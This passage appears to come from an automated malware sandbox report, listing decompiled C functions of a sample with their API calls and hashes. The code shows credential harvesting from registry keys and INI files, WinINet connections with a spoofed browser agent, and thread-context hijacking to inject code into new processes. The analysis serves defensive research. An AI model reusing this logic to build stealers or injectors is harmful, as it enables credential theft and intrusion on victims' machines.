    • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0041D7ED
    • ExpandEnvironmentStringsW.KERNEL32(?,004114F9,00000104), ref: 0041D7FA
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
    • String ID: .exe
    • API String ID: 2200435814-4119554291
    • Opcode ID: 678dbf5f367e89032df9beb8caab71a948f06670cdf1cabe41232ca7f86d138f
    • Instruction ID: b93c94d1df22a06fa92d3cff0c066bef30c711175495abcab106c684caec88bc
    • Opcode Fuzzy Hash: 678dbf5f367e89032df9beb8caab71a948f06670cdf1cabe41232ca7f86d138f
    • Instruction Fuzzy Hash: F111E972A00114ABDB107B7ADD09ECB7B6CDF89360F100526F959E71A0D778DD89CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004138D2(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t12;
    				void* _t14;
    				char* _t15;
    				void* _t18;
    
    				_t15 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
    				}
    				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
    				if(_t14 == 0) {
    					L7:
    					return 0;
    				}
    				_t18 = 0;
    				do {
    					_t1 = _t18 + 0x42200c; // 0x42200c
    					_t2 = _t18 + 0x422008; // 0x2
    					InternetSetOptionA(_t14,  *_t2, _t1, 4);
    					_t18 = _t18 + 8;
    				} while (_t18 < 0x18);
    				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
    				if(_t12 == 0) {
    					InternetCloseHandle(_t14);
    					goto L7;
    				}
    				return _t12;
    			}

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 004138E9
    • InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00413908
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00413925
    • InternetCloseHandle.WININET(00000000), ref: 00413931
    Strings
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 004138DA, 004138E8
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-3737944857
    • Opcode ID: 14dcfe9128598b8fb19586ed9be14e2dc3c8340a80a19de845de97704ccd3449
    • Instruction ID: c1d041895457b4f7cdba3245a5801219ced23edc4aacfdcef16f368c7f81b0a7
    • Opcode Fuzzy Hash: 14dcfe9128598b8fb19586ed9be14e2dc3c8340a80a19de845de97704ccd3449
    • Instruction Fuzzy Hash: 27F02B722102007ADB212B724DCCDAB7EAEEBC9752B04042DF646E1031C5358A44C778
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00413D46() {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				void* _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t22;
    				void* _t28;
    
    				_t22 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
    							_t22 = E0041215C( &_v1036 | 0xffffffff,  &_v1036);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t22;
    			}

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413D57
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413D6A
    • FreeLibrary.KERNEL32(?), ref: 00413DBC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: cc36a403a517566e28ca31b57802fcba21f6b3fc346ee256f458a90bb2cd6658
    • Instruction ID: ac467fea48eed13d1fe7c367e74f4d63d4e1353c159e730edc366066fbadf321
    • Opcode Fuzzy Hash: cc36a403a517566e28ca31b57802fcba21f6b3fc346ee256f458a90bb2cd6658
    • Instruction Fuzzy Hash: 40018871900255FBCB509FE89D845DE7BBCAB04301F1005FEB655F3290D5348F888B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00409ED4(char* __ecx, void* __eflags) {
    				int _v8;
    				void* _v12;
    				signed int _v16;
    				char* _v20;
    				intOrPtr _v24;
    				int _v28;
    				intOrPtr _v32;
    				char _v36;
    				void* _v40;
    				intOrPtr _v44;
    				char* _v48;
    				char _v60;
    				char _v80;
    				char _v100;
    				char _v120;
    				char _v152;
    				char _v216;
    				char _v284;
    				short _v804;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t70;
    				int _t102;
    				int _t110;
    				int _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t119;
    				intOrPtr _t121;
    				void* _t124;
    				intOrPtr _t127;
    				int _t134;
    				intOrPtr _t136;
    				char* _t138;
    				char* _t141;
    				signed int _t145;
    				void* _t146;
    				void* _t147;
    
    				_t129 = __ecx;
    				_t70 = E00411CCE(0xc08);
    				_t127 = _t70;
    				_t134 = 0;
    				_v24 = _t127;
    				if(_t127 == 0) {
    					return _t70;
    				} else {
    					E00419897(0x83,  &_v216);
    					_t141 =  &_v284;
    					E00419897(0x84, _t141);
    					_v48 =  &_v216;
    					_v44 = _t141;
    					E00411DB1( &_v36,  &_v36, 0, 8);
    					E00419897(0x85,  &_v120);
    					E00419897(0x86,  &_v100);
    					E00419897(0x87,  &_v60);
    					_t145 =  &_v80;
    					E00419897(0x88, _t145);
    					_t12 = _t127 + 0x3fc; // 0x3fc
    					_v20 = _t12;
    					_v16 = 0;
    					do {
    						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
    							goto L22;
    						}
    						_v28 = _t134;
    						_v8 = 0x104;
    						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
    							L21:
    							RegCloseKey(_v12);
    							goto L22;
    						} else {
    							goto L4;
    						}
    						do {
    							L4:
    							_t136 = _v24;
    							_v28 = _v28 + 1;
    							_t102 = E00415E26(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
    							_t145 = _t145 | 0xffffffff;
    							_v8 = _t102;
    							if(_t102 != _t145 && _t102 != 0) {
    								_t137 = _t136 + 0x1fe;
    								_t110 = E00415E26(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
    								_v8 = _t110;
    								if(_t110 == _t145 || _t110 == 0) {
    									_t114 = E00415E26(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
    									_v8 = _t114;
    									if(_t114 == _t145 || _t114 == 0) {
    										goto L19;
    									} else {
    										goto L10;
    									}
    								} else {
    									L10:
    									_t115 = _v12;
    									_t129 =  &_v804;
    									_v40 = _t115;
    									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
    										_t117 = _t145;
    									} else {
    										_t145 =  &_v40;
    										_t117 = E00415F4E(_t145,  &_v80, _t116, _v20, 0xff);
    									}
    									_v8 = _t117;
    									if(_t117 != 0xffffffff && _t117 != 0) {
    										_t138 = _v20;
    										if(E00409E7A(_t138) > 0) {
    											_t145 =  &_v152;
    											_t119 = 0x56;
    											E00419897(_t119, _t145);
    											_t121 = _v24;
    											_push(_t121);
    											_t129 = _t138;
    											_push(_t138);
    											_push(_t121 + 0x1fe);
    											_t124 = E004129F1(_t145, 0x307, _t138 + 0x1fe, _t145);
    											_t147 = _t147 + 0x10;
    											if(_t124 > 0) {
    												_t129 =  &_v36;
    												if(E004120F2(_t124,  &_v36, _v20 + 0x1fe) != 0) {
    													_v32 = _v32 + 1;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    							}
    							L19:
    							_v8 = 0x104;
    						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
    						_t134 = 0;
    						goto L21;
    						L22:
    						_v16 = _v16 + 1;
    					} while (_v16 < 2);
    					E00411CFE(_v24);
    					if(_v32 <= _t134) {
    						return E00411CFE(_v36);
    					}
    					return E00407DEB(0x307, _v36, 0xcb);
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008), ref: 00409F8B
    • RegEnumKeyExW.ADVAPI32 ref: 00409FB6
    • RegCloseKey.ADVAPI32(?), ref: 0040A10C
      • Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B
    • RegEnumKeyExW.ADVAPI32 ref: 0040A0F9
      • Part of subcall function 00415E26: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D7E1,?,?,00000104), ref: 00415EBC
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 0040A056
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 55004a917821085185fe75163768d8af24995224d62f918f5300c050b4be4501
    • Instruction ID: 30653615593a80cb46f7207795676ef88a7bc515065a6cd04a5c4c8ff704ad56
    • Opcode Fuzzy Hash: 55004a917821085185fe75163768d8af24995224d62f918f5300c050b4be4501
    • Instruction Fuzzy Hash: B7711B72D00219ABDB11EFA5CD45AEFBBBCEB48304F10416AF605F3291D6389E858B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00408F9A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				char _v564;
    				short _v576;
    				short _v588;
    				short _v600;
    				short _v608;
    				WCHAR* _v612;
    				WCHAR* _v616;
    				WCHAR* _v620;
    				WCHAR* _v624;
    				WCHAR* _v628;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t51;
    				WCHAR* _t54;
    				WCHAR* _t56;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t63;
    				long _t67;
    				WCHAR* _t69;
    				long _t77;
    				long _t80;
    				WCHAR* _t82;
    				void* _t83;
    				WCHAR* _t86;
    				WCHAR* _t87;
    				short* _t92;
    				WCHAR* _t93;
    				int _t102;
    				WCHAR* _t107;
    				intOrPtr _t114;
    				signed int _t115;
    				void* _t117;
    
    				_t117 = (_t115 & 0xfffffff8) - 0x26c;
    				if(E00417593( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L19:
    					return 1;
    				}
    				_t120 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t107 = E00411CCE(0x1fffe);
    					_v612 = _t107;
    					__eflags = _t107;
    					if(_t107 == 0) {
    						goto L19;
    					}
    					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
    					__eflags = _t51;
    					if(_t51 == 0) {
    						L18:
    						E00411CFE(_t107);
    						goto L19;
    					}
    					_t9 =  &(_t51[0]); // 0x1
    					_t54 = E00412BAE(_t107, _t9);
    					__eflags = _t54;
    					if(_t54 == 0) {
    						goto L18;
    					}
    					_t56 = E00411CCE(0xc1c);
    					_v620 = _t56;
    					__eflags = _t56;
    					if(_t56 != 0) {
    						_t11 =  &(_t56[0xff]); // 0x1fe
    						_t92 = _t11;
    						_v624 = _t107;
    						_v616 = _t92;
    						_t57 = 0x5c;
    						_t93 =  &(_t92[0xff]);
    						__eflags = _t93;
    						E00419897(_t57,  &_v608);
    						_t59 = 0x5d;
    						E00419897(_t59,  &_v588);
    						_t61 = 0x5e;
    						E00419897(_t61,  &_v576);
    						_t63 = 0x5f;
    						E00419897(_t63,  &_v600);
    						do {
    							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
    							__eflags = _t67;
    							if(_t67 != 0) {
    								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
    								_t25 = _t102 - 1; // -1
    								__eflags = _t25 - 0xfffe;
    								if(_t25 <= 0xfffe) {
    									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
    									__eflags = _t77;
    									if(_t77 != 0) {
    										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
    										__eflags = _t80;
    										if(_t80 != 0) {
    											_t82 = E00408E8D(_v624, _t93);
    											__eflags = _t82;
    											if(_t82 > 0) {
    												_t113 =  &_v564;
    												_t83 = 0x55;
    												E00419897(_t83,  &_v564);
    												_push(_t102);
    												_push(_v620);
    												_push(_t93);
    												_push(_v616);
    												_t37 =  &(_t93[0xff]); // 0x1fe
    												_t103 = _t37;
    												_t86 = E004129F1(_t113, 0x311, _t37, _t113);
    												_t117 = _t117 + 0x14;
    												__eflags = _t86;
    												if(_t86 > 0) {
    													_t114 = _a4;
    													_t87 = E004120F2(_t86, _t114, _t103);
    													__eflags = _t87;
    													if(_t87 != 0) {
    														_t39 = _t114 + 4;
    														 *_t39 =  &(( *(_t114 + 4))[0]);
    														__eflags =  *_t39;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							_t69 = E00412BEA(_v624, 1);
    							_v628 = _t69;
    							__eflags = _t69;
    						} while (_t69 != 0);
    						E00411CFE(_v620);
    						_t107 = _v616;
    					}
    					goto L18;
    				} else {
    					E00408F40(_t120,  &_v524, _a4);
    					goto L19;
    				}
    			}

    APIs
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • GetPrivateProfileStringW.KERNEL32 ref: 00409001
    • GetPrivateProfileStringW.KERNEL32 ref: 00409095
    • GetPrivateProfileIntW.KERNEL32 ref: 004090B3
    • GetPrivateProfileStringW.KERNEL32 ref: 004090DE
    • GetPrivateProfileStringW.KERNEL32 ref: 004090FA
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: 3e4dee2ce2c0371b9ac0d8c812f4a6baa844325e6f8f4a5c18e60ea37298c377
    • Instruction ID: c54434842e28901c345af476fdb3157fd51edee89c34d8a0717ab5b7b0674521
    • Opcode Fuzzy Hash: 3e4dee2ce2c0371b9ac0d8c812f4a6baa844325e6f8f4a5c18e60ea37298c377
    • Instruction Fuzzy Hash: 0F518431604306ABD710AF11CC05FAB7BE8AF44754F04093EF994E72A2D739DD458B96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00417B77(void* __ecx, signed int __edx, void** __esi, long _a4) {
    				char _v5;
    				void _v16;
    				struct _OVERLAPPED* _v24;
    				struct _OVERLAPPED* _v28;
    				signed int _v32;
    				signed int _v36;
    				void* _t29;
    				signed int _t31;
    				int _t38;
    				int _t39;
    				signed int _t41;
    				int _t42;
    				int _t45;
    				intOrPtr _t48;
    				void* _t49;
    				signed int _t53;
    				struct _OVERLAPPED* _t54;
    				void** _t56;
    
    				_t56 = __esi;
    				_t53 = __edx;
    				_t49 = __ecx;
    				_t54 = 0;
    				_v5 = 0;
    				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
    				 *__esi = _t29;
    				if(_t29 != 0xffffffff) {
    					_t31 = E0041703D(_t49, _t29);
    					_v36 = _t31;
    					_v32 = _t53;
    					if((_t31 & _t53) == 0xffffffff) {
    						L4:
    						CloseHandle( *_t56);
    						 *_t56 =  *_t56 | 0xffffffff;
    					} else {
    						if((_t31 | _t53) == 0) {
    							L18:
    							_t56[2] = _t56[2] | 0xffffffff;
    							_t25 =  &(_t56[3]);
    							 *_t25 = _t56[3] | 0xffffffff;
    							__eflags =  *_t25;
    							_v5 = 1;
    							E00416FED( *_t56, _t54, _t54, _t54);
    						} else {
    							_v28 = 0;
    							_v24 = 0;
    							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
    								while(1) {
    									__eflags = _a4 - _t54;
    									if(_a4 == _t54) {
    										goto L18;
    									}
    									__eflags = _a4 - 5;
    									if(_a4 != 5) {
    										L16:
    										_t38 = E00416FED( *_t56, _v28, _v24, _t54);
    										__eflags = _t38;
    										if(_t38 == 0) {
    											goto L4;
    										} else {
    											_t39 = SetEndOfFile( *_t56);
    											__eflags = _t39;
    											if(_t39 == 0) {
    												goto L4;
    											} else {
    												goto L18;
    											}
    										}
    									} else {
    										_t41 = _v16 ^ _t56[4];
    										asm("adc edi, [ebp-0x14]");
    										_t48 = _t41 + _v28 + 5;
    										asm("adc edi, ecx");
    										_v16 = _t41;
    										__eflags = 0 - _v32;
    										if(__eflags > 0) {
    											L15:
    											_t54 = 0;
    											__eflags = 0;
    											goto L16;
    										} else {
    											if(__eflags < 0) {
    												L11:
    												__eflags = _t41 - 0xa00000;
    												if(_t41 > 0xa00000) {
    													goto L15;
    												} else {
    													_t42 = E00416FED( *_t56, _t41, 0, 1);
    													__eflags = _t42;
    													if(_t42 == 0) {
    														goto L4;
    													} else {
    														_v28 = _t48;
    														_v24 = 0;
    														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
    														__eflags = _t45;
    														if(_t45 != 0) {
    															_t54 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L4;
    														}
    													}
    												}
    											} else {
    												__eflags = _t48 - _v36;
    												if(_t48 > _v36) {
    													goto L15;
    												} else {
    													goto L11;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    								goto L18;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    				L19:
    				return _v5;
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00417B98
      • Part of subcall function 0041703D: GetFileSizeEx.KERNEL32(00417BAF,00417BAF,?,?,?,00417BAF,00000000), ref: 00417049
    • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 00417BD9
    • CloseHandle.KERNEL32(?,00000000), ref: 00417BE5
    • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00417C54
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00417C7A
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: 56d487b28f9a82195becc95ff2d536cca56d263062c8f76142b3bddbba8a7f3b
    • Instruction ID: 8c0d9bd763e43f9858a0e5c2c93b941468b5dffffb6103a1eaae74492d96e575
    • Opcode Fuzzy Hash: 56d487b28f9a82195becc95ff2d536cca56d263062c8f76142b3bddbba8a7f3b
    • Instruction Fuzzy Hash: 0F41B230908209AEDB208F65CC85FEFBFF5EF48714F10411AF591A62A0D7399581CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0040E544(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
    				intOrPtr _v28;
    				signed int _v44;
    				char _v52;
    				intOrPtr _v56;
    				char _v61;
    				intOrPtr _v64;
    				signed int _v72;
    				intOrPtr _v76;
    				char _v77;
    				intOrPtr _v84;
    				intOrPtr _v85;
    				char _v89;
    				void* __esi;
    				char _t31;
    				intOrPtr _t32;
    				char* _t37;
    				intOrPtr _t44;
    				intOrPtr* _t58;
    				intOrPtr _t62;
    				intOrPtr* _t63;
    				intOrPtr _t65;
    
    				_t63 = __edi;
    				ResetEvent(_a8);
    				_t31 = E00411CCE(0x1000);
    				_t65 = 0;
    				_v52 = _t31;
    				if(_t31 != 0) {
    					_t58 = __imp__InternetSetStatusCallbackW;
    					_t32 =  *_t58(_a4, E0040E4FB);
    					_t62 = 0x28;
    					_v56 = _t32;
    					 *_a12 = 0;
    					 *__edi = 0;
    					_v61 = 1;
    					E00411DB1( &_v52,  &_v52, 0, _t62);
    					_v64 = _t62;
    					_v44 = _v72;
    					while(1) {
    						L3:
    						_t37 =  &_v52;
    						_v28 = 0x1000;
    						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
    						if(_t37 == 0) {
    							break;
    						}
    						if(_v44 != _t65) {
    							_t67 = _a12;
    							if(E00411C89( *_t63 + _v44, _a12) == 0) {
    								L9:
    								_v77 = 0;
    							} else {
    								E00411D3A( *_t67 +  *_t63, _v76, _v44);
    								 *_t63 =  *_t63 + _v56;
    								_t65 = 0;
    								continue;
    							}
    						}
    						L10:
    						asm("sbb eax, eax");
    						 *_t58(_a4,  ~(_v72 + 1) & _v72);
    						E00411CFE(_v84);
    						if(_v89 == 0) {
    							E00411CFE( *_a12);
    						}
    						_t44 = _v85;
    						goto L13;
    					}
    					if(GetLastError() != 0x3e5) {
    						goto L9;
    					} else {
    						E0041546B( &_a8);
    						goto L3;
    					}
    					goto L10;
    				} else {
    					E00411CFE(0);
    					_t44 = 0;
    				}
    				L13:
    				return _t44;
    			}

    APIs
    • ResetEvent.KERNEL32(?), ref: 0040E552
    • InternetSetStatusCallbackW.WININET(?,0040E4FB), ref: 0040E587
    • InternetReadFileExA.WININET ref: 0040E5C7
    • GetLastError.KERNEL32 ref: 0040E5D1
    • InternetSetStatusCallbackW.WININET(?,?), ref: 0040E635
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
    • String ID:
    • API String ID: 4044253124-0
    • Opcode ID: 033e0bb26777d2f9070fe7bd6c1ede46ae4a546870698f1664d18c4097a1fb22
    • Instruction ID: 5ee9b623b86201fea9687af39c3a8196f1efda26349449274a2910d6d85fe58f
    • Opcode Fuzzy Hash: 033e0bb26777d2f9070fe7bd6c1ede46ae4a546870698f1664d18c4097a1fb22
    • Instruction Fuzzy Hash: 8231AF71104341AFCB11DF65DC40A9ABBE8FF95708F004C2AF984972A1E739D964CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F181(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    				char _v32;
    				void _v360;
    				short _v880;
    				void* __edi;
    				void* __esi;
    				void* _t18;
    				void* _t25;
    				void* _t26;
    				long _t39;
    				void* _t42;
    				void* _t44;
    				long _t47;
    
    				_t48 =  &_v32;
    				_t18 = 0x2b;
    				_v16 = __edx;
    				_t44 = __ecx;
    				E00419897(_t18,  &_v32);
    				if(E00417593(_t48,  &_v880, _t44) == 0) {
    					L11:
    					return 1;
    				}
    				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
    				_v8 = _t25;
    				if(_t25 == 0xffffffff) {
    					goto L11;
    				}
    				_t26 = 0x30;
    				_t39 = 0;
    				E00419861(_t26,  &_v360);
    				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
    					L9:
    					FlushFileBuffers(_v8);
    					CloseHandle(_v8);
    					if(_t39 == 0) {
    						E00417064( &_v880);
    					}
    					goto L11;
    				} else {
    					_t42 = _v16;
    					if(_t42 == 0) {
    						L7:
    						_t39 = 1;
    						goto L9;
    					}
    					_t47 = E0041283B(_t42);
    					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
    						_t39 = 0;
    						goto L9;
    					} else {
    						goto L7;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040F1CC
    • WriteFile.KERNEL32(0040F169,?,00000146,?,00000000,00000000), ref: 0040F20A
    • WriteFile.KERNEL32(0040F169,?,00000000,?,00000000), ref: 0040F22E
    • FlushFileBuffers.KERNEL32(0040F169), ref: 0040F242
    • CloseHandle.KERNEL32(0040F169), ref: 0040F24B
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
    • String ID:
    • API String ID: 2459967240-0
    • Opcode ID: da73463de5de5db7338b432361a2fdc757fa0bc37107aae9d1ba310e5e1c1d65
    • Instruction ID: a2198eed0751b6034820acdcabda30e86b8b24b278b1a98d599fbe484e92e051
    • Opcode Fuzzy Hash: da73463de5de5db7338b432361a2fdc757fa0bc37107aae9d1ba310e5e1c1d65
    • Instruction Fuzzy Hash: 1F21DC71901218BBCF20ABA18D45FEF7BBCAB45750F0440BBB500F21A0DA369F4ACA64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E004105EA(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
    				struct _CONTEXT _v720;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t32;
    				void* _t36;
    				void* _t37;
    				void** _t45;
    				void* _t46;
    				void* _t47;
    				void** _t50;
    				void* _t52;
    				void* _t53;
    				signed int _t55;
    
    				_t47 = __edx;
    				_t45 = _a4;
    				_t32 =  *0x423b84(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
    				_a40 = _t32;
    				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E0041CB59() != 0 && GetProcessId( *_t45) != 0) {
    					_t36 = E0041C98A(_t46, _t47, _t35);
    					_a44 = _t36;
    					_t63 = _t36;
    					if(_t36 != 0) {
    						_push(_t52);
    						_t37 = E0041CA6E(_t46,  *_t45, _t52, _t63, _t36, 0);
    						_t50 = _a8;
    						_t53 = _t37;
    						_a32 = _t53;
    						_t55 = _t53 -  *0x423b74 + E0041D1E0;
    						_v720.ContextFlags = 0x10003;
    						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x423b8c) {
    							L12:
    							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
    						} else {
    							if(( *0x423b60 & 0x00000010) != 0) {
    								_t55 = _t55 ^ _v720.Eax;
    							}
    							_v720.Eax = _t55;
    							_v720.ContextFlags = 0x10002;
    							if(SetThreadContext( *_t50,  &_v720) == 0) {
    								goto L12;
    							}
    						}
    						CloseHandle(_a44);
    					}
    				}
    				return _a40;
    			}

    APIs
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • GetProcessId.KERNEL32(?), ref: 00410652
      • Part of subcall function 0041C98A: CreateMutexW.KERNEL32(00423B98,00000001,?,00423DD8,0001FDA6,?,00000002,?,0001FDA6), ref: 0041C9D2
      • Part of subcall function 0041C98A: GetLastError.KERNEL32 ref: 0041C9DE
      • Part of subcall function 0041C98A: CloseHandle.KERNEL32(00000000), ref: 0041C9EC
    • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004106A4
    • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 004106E4
    • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 004106FA
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00410703
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
    • String ID:
    • API String ID: 3998962940-0
